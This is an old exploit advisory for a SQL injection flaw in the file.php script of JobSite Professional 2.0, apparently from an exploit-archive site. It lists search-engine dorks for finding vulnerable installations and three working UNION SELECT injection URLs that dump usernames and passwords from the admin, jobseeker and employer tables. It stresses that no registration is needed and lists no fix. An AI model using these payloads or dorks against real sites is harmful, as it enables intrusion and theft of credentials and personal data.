JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability

2007-10-28 00:00:00

#########################################################################
JobSite Professional v2.0 Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : ZynbER
## HOME : NoWhere


## Script WebSite:
http://www.jobsiteprofessional.com

## Dork english version : inurl:index.php?page=en_jobseekers
## Dork french version : inurl:index.php?page=fr_Candidats


## EXPLOITS :

Vulnerability in (File.php?id=)



http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*



## Note
No registration is needed!!



## GREETZ : MEKNES - SIDIBABA - MARROK - SKIZO - BouKa-BouKa

#########################################################################
JobSite Professional v2.0 Remote SQL Injection Vulnerability
#########################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.